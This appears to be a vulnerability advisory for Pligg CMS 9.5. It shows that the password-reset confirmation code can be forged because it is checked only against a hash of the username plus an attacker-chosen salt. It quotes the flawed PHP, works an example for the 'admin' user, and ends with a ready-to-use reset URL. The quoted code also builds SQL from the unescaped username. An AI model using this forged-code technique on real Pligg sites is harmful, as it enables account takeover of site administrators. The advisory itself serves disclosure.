pligg-password.txt

`Pligg critical vulnerability  
  
Concerned version : 9.5 and ?  
  
Description :  
  
Pligg is a flexible CMS based on PHP and MYSQL.  
  
To reinitialize a forgotten password, Pligg follows a classical  
process. A confirmation code is generated and sent by email to the  
concerned user mail box. The user has to follow the link containing  
the confirmation code and if the confirmation code is checked  
successfully, the password is reinitialized to a pre-defined value.  
  
  
you can find a part of the source code in charge of this check below :  
  
  
WEB_ROOT/libs/html1.php  
  
  
[ ]  
  
function generateHash($plainText, $salt = null){  
  
if ($salt === null) {  
  
$salt = substr(md5(uniqid(rand(), true)), 0, SALT_LENGTH); }  
  
else {  
  
$salt = substr($salt, 0, SALT_LENGTH);  
  
}  
  
return $salt . sha1($salt . $plainText);  
  
}  
  
[ ]  
  
  
  
WEB_ROOT/login.php :  
  
  
[ ]  
  
$confirmationcode = $_GET["confirmationcode"];  
  
if(generateHash($username, substr($confirmationcode, 0, SALT_LENGTH))  
== $confirmationcode){  
  
$db->query('UPDATE `' . table_users . '` SET `user_pass` =  
"033700e5a7759d0663e33b18d6ca0dc2b572c20031b575750" WHERE `user_login`  
= "'.$username.'"');  
  
[ ]  
  
  
  
Unfortunately, as you can read, you can easily generate, for a given  
username, a confirmation code that passes successfully the following  
check "if(generateHash($username, substr($confirmationcode, 0,  
SALT_LENGTH)) == $confirmationcode)"  
  
  
Example :  
  
  
Let's choose :  
salt = 123456789  
  
and,  
  
username = admin  
  
we have :  
  
sha1(123456789admin) = 1e2f566cbda0a9c855240bf21b8bae030404cad7  
  
and thus :  
  
confirmationcode = 1234567891e2f566cbda0a9c855240bf21b8bae030404cad7  
  
with the following url you can reinitialize the user admin password :  
  
  
http://www.domain.com/login.php?processlogin=4&username=admin&confirmationcode=1234567891e2f566cbda0a9c855240bf21b8bae030404cad7  
  
  
242th.section.  
`